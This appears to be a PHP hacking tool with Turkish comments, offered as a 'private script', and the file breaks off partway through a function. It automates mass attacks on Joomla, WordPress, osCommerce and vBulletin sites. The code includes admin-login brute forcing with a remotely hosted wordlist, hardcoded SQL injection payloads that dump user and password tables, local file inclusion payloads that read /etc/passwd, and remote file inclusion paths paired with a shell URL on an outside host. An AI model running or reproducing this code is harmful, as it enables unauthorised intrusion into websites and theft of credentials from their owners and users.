<?php/*Hedef Site Hacking Tool[BOT] - Private ScriptCoded by HeLia ÖNE

1. <?php
2. /*
3. Hedef Site Hacking Tool[BOT] - Private Script
4. Coded by HeLia
5.  
6. ÖNEMLİ !!!!!!
7.  
8. Eğer scripti localde kullanmak istiyorsanız
9.  
10. AppServ 2.6.0 bilgisayırınızda yüklü olmalıdır. ve
11. register_globals = On
12. register_long_arrays = On
13. magic_quotes_gpc = On
14.  
15. Bu fonksiyonları php.ini'den off hale getirin.
16.  
17. ÖNEMLİ !!!!!!
18.  
19. IMPORTANT !!!!!!
20.  
21. If you want use this script on localhost :
22.  
23. AppServ 2.6.0 must be installed in your pc and
24. register_globals = On
25. register_long_arrays = On
26. magic_quotes_gpc = On
27.  
28. Make this functions into Off in php.ini
29.  
30. IMPORTANT !!!!!!
31.  
32. [REVERSE-IP] in Public Version
33. [FIND SCRIPTS] in Public Version
34. [JOOMLA TOKEN SCAN] in Public Version
35. [JOOMLA ADMIN PANEL BRUTE] in Private Version
36. [JOOMLA SQL INJECTION] in Private Version
37. [JOOMLA RFI SCAN] in Private Version
38. [JOOMLA LFI SCAN] in Private Version
39. [JOOMLA SHELL SCAN] in Private Version
40. [WORDPRESS BRUTE FORCE] in Private Version
41. [WORDPRESS SQL INJECTION] in Private Version
42. [WORDPRESS RFI SCAN] in Private Version
43. [OSCOMMERCE ADMIN ADD] in Private Version
44. [VBULLETIN BRUTE FORCE] in Private Version
45. [VBULLETIN DATA SQL SCAN] in Private Version
46. [PAGERANK CHECKER] in Private Version
47. [SQL INJECTION SCAN] in Private Version
48. [FTP CRACKER] in Private Version
49. [KNIGHT ONLINE CRACKER] in Private Version
50. [METIN2 CRACKER] in Private Version
51.  
52. */
53.  
54. ob_start();
55. set_time_limit(0);
56.  
57.  
58. class H_Tool{
59.  
60. public $wordlist = "http://www.evdenevenakliyatlar.in/wordlist.txt";
61. public $reverse = "http://networktools.nl/reverseip/";
62. public $title = "#</b>:(.*?)</pre>#s";
63. public $joom = array('components','option=com_');
64. public $word = array('wp-content','wp-includes');
65. public $osc = "Powered by osCommerce";
66. public $vb = "Powered by vBulletin";
67. public $token = "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si";
68. public $url_1 = "/index.php?option=com_user&view=reset&layout=confirm";
69. public $url_2 = "/index.php?option=com_user&task=confirmreset";
70. public $url_3 = "/administrator/index.php";
71. public $url_4 = "/wp-login.php";
72. public $url_5 = "/admin/administrators.php/login.php?action=insert";
73. public $url_6 = "/admin/login.php?action=process";
74. public $url_7 = "/admincp/index.php";
75. public $url_8 = "/login.php?do=login";
76. public $url_9 = "/faq.php?s=&do=search&q=database&match=all&titlesonly=0";
77. public $wpreg = "general.php";
78. public $jomreg = "com_config";
79. public $osreg = "configuration.php";
80. public $yol_1 = "/templates/beez/index.php";
81. public $yol_2 = "/templates/rhuk_milkyway/index.php";
82. public $yol_3 = "/templates/system/index.php";
83. public $shellkey = "safe_mod";
84. public $sqlregex = "/:([0-9a-f]{32}):/";
85. public $lfiregex = "root:x:";
86. public $pgregex = '#<td align="center">(.*?)</td></tr>#s';
87. public $vbregex = "/name=\"s\" value=\"([0-9a-f]{32})\"/si";
88. public $vbreg = "logout";
89. public $datareg = "Port:";
90. public $hata = array('Sql syntax','mysql_fetch_array()','mysql_fetch_row()','mysql_num_rows()','Unclosed');
91. public $sql = '/https?\:\/\/[^\" ]+/i';
92. public $shell = "http://www.pirates-crew.org/ox/miya/red.txt?";
93. public $sql_1 = "/index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*";
94. public $sql_2 = "/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(0x3a5f,username,0x3a,password,0x5f3a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
95. public $sql_3 = "/index.php?option=com_ttvideo&task=video&cid=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17%20FROM%20jos_users";
96. public $sql_4 = "/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password&#41;,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users–";
97. public $sql_5 = "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
98. public $sql_6 = "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
99. public $sql_7 = "/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain";
100. public $sql_8 = "/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*";
101. public $sql_9 = "/?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201";
102. public $sql_10 = "/wordpress/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--";
103. public $sql_11 = "/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--";
104. public $sql_12 = "/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*";
105. public $sql_13 = "/wp-admin/admin.php?page=people&action=printable&event_id=-12+union+select+0,1,2,user_pass+from+wp_users";
106. public $lfi_1 = "/jeauto/index.php?option=com_jeauto&view=../../../../../../../../../../../../../../../etc/passwd%00";
107. public $lfi_2 = "/index.php?option=com_jeauto&view=../../../../../../../../../../etc/passwd%00";
108. public $lfi_3 = "/index.php?option=com_jradio&controller=../../../../../../../../../../etc/passwd%00";
109. public $lfi_4 = "/components/com_xgallery/helpers/img.php?file=../../../../../../../../../../etc/passwd%00&Itemid=4";
110. public $lfi_5 = "/index.php?option=com_jotloader&section=../../../../../../../../../../etc/passwd%00";
111. public $lfi_6 = "/index.php?option=com_picasa2gallery&controller=../../../../../../../../etc/passwd%00";
112. public $lfi_7 = "/index.php?option=com_communitypolls&controller=../../../../../..etc/passwd%00";
113. public $lfi_8 = "/index.php?option=com_news_portal&controller=../../../../../../../../../../../../etc/passwd%00";
114. public $lfi_9 = "/index.php?option=com_ccnewsletter&controller=../../../../../../../etc/passwd%00";
115. public $lfi_10 = "/index.php?option=com_jesubmit&view=../../../../../../../../../../etc/passwd%00";
116. public $lfi_11 = "/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../etc/passwd%00";
117. public $rfi_1 = "/components/com_simpleboard/file_upload.php?sbp=";
118. public $rfi_2 = "/index.php?option=com_adsmanager&mosConfig_absolute_path=";
119. public $rfi_3 = "/components/com_hashcash/server.php?mosConfig_absolute_path=";
120. public $rfi_4 = "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
121. public $rfi_5 = "/components/com_performs/performs.php?mosConfig_absolute_path=";
122. public $rfi_6 = "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
123. public $rfi_7 = "/components/com_smf/smf.php?mosConfig_absolute_path=";
124. public $rfi_8 = "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=";
125. public $rfi_9 = "/akocomments.php?mosConfig_absolute_path=";
126. public $rfi_10 = "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=";
127. public $rfi_11 = "/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=";
128. public $rfi_12 = "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=";
129. public $rfi_13 = "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=";
130. public $rfi_14 = "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=";
131. public $rfi_15 = "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=";
132. public $rfi_16 = "/modules/mod_weather.php?absolute_path=";
133. public $rfi_17 = "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=";
134. public $rfi_18 = "/modules/mod_calendar.php?absolute_path=";
135. public $rfi_19 = "/includes/Archive/Tar.php?mosConfig_absolute_path=";
136. public $rfi_20 = "/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=";
137. public $rfi_21 = "/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=";
138. public $wprfi_1 = "/Enigma2.php?boarddir=";
139. public $wprfi_2 = "/mygallery/myfunctions/mygallerybrowser.php?myPath=";
140. public $wprfi_3 = "/plugins/wp-table/js/wptable-button.phpp?wpPATH=";
141. public $wprfi_4 = "/plugins/wordtube/wordtube-button.php?wpPATH=";
142. public $wprfi_5 = "/plugins/myflash/myflash-button.php?wpPATH=";
143. public $wprfi_6 = "/plugins/BackUp/Archive.php?bkpwp_plugin_path=";
144. public $wprfi_7 = "/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=";
145. public $wprfi_8 = "/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=";
146. public $wprfi_9 = "/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=";
147. public $wprfi_10 = "/plugins/sniplets/modules/syntax_highlight.php?libpath=";
148.  
149.  
150. public function ana(){
151.  
152. echo "\n#######################################\nHedef Hacking Tool Private Script #\n";
153. echo "Coded by MiyaChung #\n";
154. echo "Usage : php tool.php komutlar #\n";
155. echo "MiyaChung@hotmail.com #\n";
156. echo "www.mavi1.org #\nSpecial Thanks : xzadx #\n#######################################\n";
157.  
158. }
159. public function komutlar(){
160.  
161. echo "\nKomutlar\n\n 1.php tool.php www.site.com = (Reverse IP)\n";
162. echo " 2.php bot.php ayir = (Ayirma Joomla-wordpress vs.)\n";
163. echo " 3.php bot.php jomtoken = (Joomla token tara)\n";
164. echo " 4.php bot.php jombrute = (Joomla brute)\n";
165. echo " 5.php bot.php jomsql = (Joomla SQL Injection ara)\n";
166. echo " 6.php bot.php jomlfi = (Joomla LFI ara)\n";
167. echo " 7.php bot.php jomrfi = (Joomla RFI ara)\n";
168. echo " 8.php bot.php shellara = (Joomla shell ara)\n";
169. echo " 9.php bot.php wpbrute = (Wordpress brute)\n";
170. echo " 10.php bot.php wpsql = (Wordpress SQL Injection ara)\n";
171. echo " 11.php bot.php wprfi = (Wordpress RFI Ara)\n";
172. echo " 12.php bot.php osreset = (osCommerce admin reset)\n";
173. echo " 13.php bot.php vbrute = (vBulletin Brute Force)\n";
174. echo " 14.php bot.php datasql = (vBulletin Data SQL ara)\n";
175. echo " 15.php bot.php pagerank = (Pagerank Checker)\n";
176. echo " 16.php bot.php sqlinj = (SQL Injection ara)\n";
177. echo " 17.php bot.php ftpbrute = (FTP Cracker)\n";
178. echo " 18.php bot.php kobrute = (Knight Online Cracker)\n";
179. echo " 19.php bot.php metinbrute = (Metin2 Cracker)\n";
180.  
181. }
182. public function kaydet($dosya,$icerik){
183.  
184. $fopen = fopen($dosya,'ab');
185. fwrite($fopen,$icerik."\r\n");
186. fclose($fopen);
187.  
188.  
189. }
190.  
191.  
192. public function reverse($site){
193.  
194. $soket=curl_init();
195. curl_setopt($soket,CURLOPT_URL,$this->reverse.$site);
196. curl_setopt($soket,CURLOPT_RETURNTRANSFER,1);
197. curl_exec($soket);
198. $exec=curl_exec($soket);
199. curl_close($soket);
200.  
201. preg_match_all($this->title,$exec,$yaz);
202. foreach($yaz[0] as $yazdir){
203. $yazdir=ereg_replace("</b>:","",$yazdir);
204. $yazdir=ereg_replace("</pre>","",$yazdir);
205. $yazdir=explode("\n",$yazdir);
206. foreach($yazdir as $liste){
207. $liste=trim($liste);
208.  
209. $kaydet = self::kaydet("reverse.txt",$liste);
210. }
211. $say = explode("\n",file_get_contents("reverse.txt"));
212. $say = count($say);
213.  
214. echo "Toplam ".$say." Site var . Siteler reverse.txt olarak kaydedildi.";
215.  
216. }
217.  
218. }
219. public function ayir(){
220.  
221.  
222. $siteler = explode("\n",file_get_contents('reverse.txt'));
223.  
224. foreach($siteler as $tumsite){
225.  
226. $tumsite=trim($tumsite);
227.  
228. $curl=curl_init();
229. curl_setopt($curl,CURLOPT_URL,$tumsite);
230. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
231. curl_setopt($curl,CURLOPT_TIMEOUT,15);
232. $calistir = curl_exec($curl);
233.  
234. if(eregi($this->joom[0],$calistir)){
235.  
236. echo $tumsite." -> Joomla bulundu joomla.txt\n";
237.  
238. ob_flush();
239. flush();
240.  
241. $kayit_1 = self::kaydet("joomla.txt",$tumsite);
242.  
243. }elseif(eregi($this->joom[1],$calistir)){
244. echo $tumsite." -> Joomla bulundu joomla.txt\n";
245.  
246. ob_flush();
247. flush();
248. $kayit_2 = self::kaydet("joomla.txt",$tumsite);
249. }elseif(eregi($this->word[0],$calistir)){
250. echo $tumsite." -> Wordpress bulundu wordpress.txt\n";
251.  
252. ob_flush();
253. flush();
254.  
255. $kayit_3 = self::kaydet("wordpress.txt",$tumsite);
256. }elseif(eregi($this->word[1],$calistir)){
257. echo $tumsite." -> Wordpress bulundu wordpress.txt\n";
258.  
259. ob_flush();
260. flush();
261.  
262. $kayit_3 = self::kaydet("wordpress.txt",$tumsite);
263. }elseif(eregi($this->osc,$calistir)){
264. echo $tumsite." -> osCommerce bulundu oscommerce.txt\n";
265.  
266. ob_flush();
267. flush();
268.  
269. $kayit_3 = self::kaydet("oscommerce.txt",$tumsite);
270. }elseif(eregi($this->vb,$calistir)){
271.  
272. echo $tumsite." -> vBulletin bulundu vbulletin.txt\n";
273. ob_flush();
274. flush();
275.  
276. $kayit_4 = self::kaydet("vbulletin.txt",$tumsite);
277. }
278.  
279.  
280. }
281. echo "\nArama bitti.\n";
282.  
283. }
284. public function token_1($site){
285.  
286. $curl=curl_init();
287. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
288. curl_setopt($curl, CURLOPT_URL,$site);
289. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
290. curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
291. curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
292. curl_setopt($curl, CURLOPT_TIMEOUT,35);
293. $exec=curl_exec($curl);
294. curl_close($curl);
295. return $exec;
296.  
297.  
298.  
299.  
300. }
301. public function token_2(){
302.  
303.  
304.  
305. $explode = explode("\n",file_get_contents("joomla.txt"));
306. foreach($explode as $sitelist){
307. $sitelist=trim($sitelist);
308. $url_1 = $sitelist.$this->url_1;
309. $hash = self::hashAl($url_1);
310. $url_2 = $sitelist.$this->url_2;
311.  
312. $curl=curl_init();
313. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
314. curl_setopt($curl, CURLOPT_URL,$url_2);
315. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
316. curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
317. curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
318. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
319. curl_setopt($curl, CURLOPT_POST, 1);
320. curl_setopt($curl, CURLOPT_POSTFIELDS, "token=%27&".$hash."=1");
321. curl_setopt($curl, CURLOPT_TIMEOUT,35);
322. $exec = curl_exec($curl);
323. curl_close($curl);
324. if(eregi('name="password1"',$exec)){
325.  
326. echo $sitelist." -> Joomla Token Bulundu token.txt\n";
327.  
328. ob_flush();
329. flush();
330. $kaydet=self::kaydet("token.txt",$sitelist.$this->url_1);
331. }
332.  
333.  
334. }
335. @unlink("cookie.txt");
336. echo "\nTarama Bitti sonuclar token.txt\n";
337.  
338. }
339.  
340. public function hashAl($site){
341.  
342. $url=self::token_1($site);
343. preg_match_all($this->token,$url,$hash);
344. return $hash[1][0];
345.  
346. }
347. public function jombrute_1($url){
348.  
349.  
350. $curl=curl_init();
351. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
352. curl_setopt($curl, CURLOPT_URL,$url);
353. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
354. curl_setopt($curl, CURLOPT_COOKIEJAR, 'cook.txt');
355. curl_setopt($curl, CURLOPT_COOKIEFILE, 'cook.txt');
356. curl_setopt($curl, CURLOPT_TIMEOUT,35);
357. $exec=curl_exec($curl);
358. curl_close($curl);
359. return $exec;
360.  
361.  
362. }
363. public function jombrute_2(){
364. $exp = explode("\n",file_get_contents("http://www.evdenevenakliyatlar.in/wordlist.txt"));
365. foreach($exp as $passwords){
366. $passwords=trim($passwords);
367. $explode = explode("\n",file_get_contents("joomla.txt"));
368. foreach($explode as $sitelist){
369. $sitelist=trim($sitelist);
370. $url_1 = $sitelist.$this->url_3;
371. $hash = self::hash_Al($url_1);
372. $url_2 = $sitelist.$this->url_3;
373.  
374. $curl=curl_init();
375. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
376. curl_setopt($curl, CURLOPT_URL,$url_2);
377. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
378. curl_setopt($curl, CURLOPT_COOKIEJAR, 'cook.txt');
379. curl_setopt($curl, CURLOPT_COOKIEFILE, 'cook.txt');
380. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
381. curl_setopt($curl, CURLOPT_POST, 1);
382. curl_setopt($curl, CURLOPT_POSTFIELDS, 'username=admin&passwd='.$passwords.'&lang=&option=com_login&task=login&'.$hash.'=1');
383. curl_setopt($curl, CURLOPT_TIMEOUT,35);
384. $exec = curl_exec($curl);
385. curl_close($curl);
386. if(eregi($this->jomreg,$exec)){
387.  
388. echo $sitelist." -> admin:".$passwords." Panel girisi bulundu jombrute.txt\n";
389. ob_flush();
390. flush();
391. $kaydet=self::kaydet("jombrute.txt",$sitelist.$this->url_3." Password : ".$passwords."");
392. }
393.  
394. }
395. }
396. @unlink("cook.txt");
397. echo "\nJoomla brute force bitti jombrute.txt";
398. }
399.  
400. public function hash_Al($site){
401. $url=self::jombrute_1($site);
402. preg_match_all($this->token,$url,$hash);
403. return $hash[1][0];
404.  
405.  
406.  
407. }
408. public function wpbrute(){
409. $exp = explode("\n",file_get_contents("http://www.evdenevenakliyatlar.in/wordlist.txt"));
410. foreach($exp as $passwords){
411. $passwords=trim($passwords);
412. $explode = explode("\n",file_get_contents("wordpress.txt"));
413. foreach($explode as $sites){
414. $sifreler=trim($sifreler);
415. $sites=trim($sites);
416.  
417. $curl = curl_init();
418. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
419. curl_setopt($curl,CURLOPT_URL,$sites.$this->url_4);
420. curl_setopt($curl,CURLOPT_COOKIEJAR,"cookie.dat");
421. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
422. curl_setopt($curl,CURLOPT_POST,1);
423. curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$passwords."&redirect_to=".$sites."/wp-admin/&testcookie=1");
424. curl_setopt($curl,CURLOPT_TIMEOUT,25);
425. $calis = curl_exec($curl);
426. if(eregi($this->wpreg,$calis)){
427.  
428. echo $sites." -> admin:".$passwords." Wordpress girisi bulundu wpbrute.txt\n";
429. ob_flush();
430. flush();
431.  
432. $kaydet=self::kaydet('wpbrute.txt',$sites.$this->url_4." Password : ".$passwords."");
433.  
434. }
435.  
436.  
437.  
438. }
439. }
440. @unlink("cookie.dat");
441. echo "\nWordpress Brute Force bitti";
442. }
443.  
444. public function osc_reset($sites){
445. $curl=curl_init();
446. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
447. curl_setopt($curl,CURLOPT_URL,$sites.$this->url_5);
448. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
449. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
450. curl_setopt($curl,CURLOPT_POST,1);
451. curl_setopt($curl,CURLOPT_POSTFIELDS,'username=miyachung&password=12345&x=0&y=0');
452. curl_setopt($curl,CURLOPT_TIMEOUT,10);
453. $run=curl_exec($curl);
454. curl_close($curl);
455. return $run;
456.  
457. }
458. public function osc_login(){
459. $explode = explode("\n",file_get_contents("oscommerce.txt"));
460. foreach($explode as $siteler){
461. $siteler=trim($siteler);
462.  
463. $reset=self::osc_reset($siteler);
464.  
465. $curl=curl_init();
466. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
467. curl_setopt($curl,CURLOPT_URL,$siteler.$this->url_6);
468. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
469. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
470. curl_setopt($curl,CURLOPT_COOKIEFILE,'os.txt');
471. curl_setopt($curl,CURLOPT_COOKIEJAR,'os.txt');
472. curl_setopt($curl,CURLOPT_POST,1);
473. curl_setopt($curl,CURLOPT_POSTFIELDS,'username=miyachung&password=12345');
474. curl_setopt($curl,CURLOPT_TIMEOUT,10);
475. $run=curl_exec($curl);
476. curl_close($curl);
477. if(eregi($this->osreg,$run)){
478.  
479. echo $siteler." -> osCommerce admin eklendi osreset.txt\n";
480. ob_flush();
481. flush();
482.  
483. $kaydet=self::kaydet("osreset.txt",$siteler."/admin/login.php");
484.  
485. }
486.  
487.  
488. }
489. @unlink("os.txt");
490. echo "\nOscommerce admin reset deneme bitti\n";
491. }
492. public function shellara(){
493.  
494. $explode = explode("\n",file_get_contents("reverse.txt"));
495. foreach($explode as $sites){
496.  
497. $sites=trim($sites);
498.  
499. $url_1 = self::curl($sites.$this->yol_1);
500. $url_2 = self::curl($sites.$this->yol_2);
501. $url_3 = self::curl($sites.$this->yol_3);
502. if(eregi($this->shellkey,$url_1)){
503. echo $sites.$this->yol_1." -> Shell Bulundu shell.txt\n";
504.  
505. ob_flush();
506. flush();
507. $kaydet=self::kaydet("shell.txt",$sites.$this->yol_1);
508. }
509. if(eregi($this->shellkey,$url_2)){
510. echo $sites.$this->yol_2." -> Shell Bulundu shell.txt\n";
511.  
512. ob_flush();
513. flush();
514. $kaydet=self::kaydet("shell.txt",$sites.$this->yol_2);
515. }
516. if(eregi($this->shellkey,$url_3)){
517. echo $sites.$this->yol_3." -> Shell Bulundu shell.txt\n";
518.  
519. ob_flush();
520. flush();
521. $kaydet=self::kaydet("shell.txt",$sites.$this->yol_3);
522. }
523.  
524.  
525.  
526.  
527.  
528.  
529. }
530.  
531. echo "\nShell Arama bitti.";
532.  
533. }
534. public function curl($site){
535. $curl=curl_init();
536. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
537. curl_setopt($curl,CURLOPT_URL,$site);
538.  
539. $exec=curl_exec($curl);
540. curl_close($curl);
541. return $exec;
542. }
543.  
544. public function jomsql(){
545.  
546. $explode = explode("\n",file_get_contents("joomla.txt"));
547. foreach($explode as $sites){
548.  
549. $sites=trim($sites);
550. $bak_1 = self::curl($sites.$this->sql_1);
551. $bak_2 = self::curl($sites.$this->sql_2);
552. $bak_3 = self::curl($sites.$this->sql_3);
553. $bak_4 = self::curl($sites.$this->sql_4);
554. $bak_5 = self::curl($sites.$this->sql_5);
555. $bak_6 = self::curl($sites.$this->sql_6);
556.  
557. if(preg_match($this->sqlregex,$bak_1)){
558.  
559. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
560.  
561. ob_flush();
562. flush();
563.  
564. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_1);
565.  
566. }
567. if(preg_match($this->sqlregex,$bak_2)){
568.  
569. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
570.  
571. ob_flush();
572. flush();
573.  
574. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_2);
575.  
576. }
577. if(preg_match($this->sqlregex,$bak_3)){
578.  
579. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
580.  
581. ob_flush();
582. flush();
583.  
584. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_3);
585.  
586. }
587. if(preg_match($this->sqlregex,$bak_4)){
588.  
589. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
590.  
591. ob_flush();
592. flush();
593.  
594. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_4);
595.  
596. }
597. if(preg_match($this->sqlregex,$bak_5)){
598.  
599. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
600.  
601. ob_flush();
602. flush();
603.  
604. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_5);
605.  
606. }
607. if(preg_match($this->sqlregex,$bak_6)){
608.  
609. echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
610.  
611. ob_flush();
612. flush();
613.  
614. $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_6);
615.  
616. }
617.  
618.  
619.  
620.  
621. }
622.  
623. echo "\nJoomla SQL Aramasi bitti.";
624.  
625.  
626.  
627. }
628.  
629. public function wpsql(){
630.  
631. $explode = explode("\n",file_get_contents("wordpress.txt"));
632.  
633. foreach($explode as $sites){
634. $sites=trim($sites);
635. $bak_1 = self::curl($sites.$this->sql_7);
636. $bak_2 = self::curl($sites.$this->sql_8);
637. $bak_3 = self::curl($sites.$this->sql_9);
638. $bak_4 = self::curl($sites.$this->sql_10);
639. $bak_5 = self::curl($sites.$this->sql_11);
640. $bak_6 = self::curl($sites.$this->sql_12);
641. $bak_7 = self::curl($sites.$this->sql_13);
642.  
643.  
644. if(preg_match($this->sqlregex,$bak_1)){
645.  
646. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
647. ob_flush();
648. flush();
649.  
650. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_7);
651.  
652. }
653. if(preg_match($this->sqlregex,$bak_2)){
654.  
655. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
656. ob_flush();
657. flush();
658.  
659. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_8);
660.  
661. }
662. if(preg_match($this->sqlregex,$bak_3)){
663.  
664. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
665. ob_flush();
666. flush();
667.  
668. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_9);
669.  
670. }
671. if(preg_match($this->sqlregex,$bak_4)){
672.  
673. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
674. ob_flush();
675. flush();
676.  
677. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_10);
678.  
679. }
680. if(preg_match($this->sqlregex,$bak_5)){
681.  
682. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
683. ob_flush();
684. flush();
685.  
686. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_11);
687.  
688. }
689. if(preg_match($this->sqlregex,$bak_6)){
690.  
691. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
692. ob_flush();
693. flush();
694.  
695. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_12);
696.  
697. }
698. if(preg_match($this->sqlregex,$bak_7)){
699.  
700. echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
701. ob_flush();
702. flush();
703.  
704. $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_13);
705.  
706. }
707.  
708. }
709.  
710. echo "\nWordpress SQL Aramasi bitti";
711.  
712.  
713. }
714. public function jomlfi(){
715. $explode = explode("\n",file_get_contents("joomla.txt"));
716.  
717. foreach($explode as $sites){
718. $sites=trim($sites);
719. $bak_1 = self::curl($sites.$this->lfi_1);
720. $bak_2 = self::curl($sites.$this->lfi_2);
721. $bak_3 = self::curl($sites.$this->lfi_3);
722. $bak_4 = self::curl($sites.$this->lfi_4);
723. $bak_5 = self::curl($sites.$this->lfi_5);
724. $bak_6 = self::curl($sites.$this->lfi_6);
725. $bak_7 = self::curl($sites.$this->lfi_7);
726. $bak_8 = self::curl($sites.$this->lfi_8);
727. $bak_9 = self::curl($sites.$this->lfi_9);
728. $bak_10 = self::curl($sites.$this->lfi_10);
729. $bak_11 = self::curl($sites.$this->lfi_11);
730.  
731. if(eregi($this->lfiregex,$bak_1)){
732. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
733.  
734. ob_flush();
735. flush();
736.  
737. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_1);
738.  
739. }
740. if(eregi($this->lfiregex,$bak_2)){
741. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
742.  
743. ob_flush();
744. flush();
745.  
746. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_2);
747.  
748. }
749. if(eregi($this->lfiregex,$bak_3)){
750.  
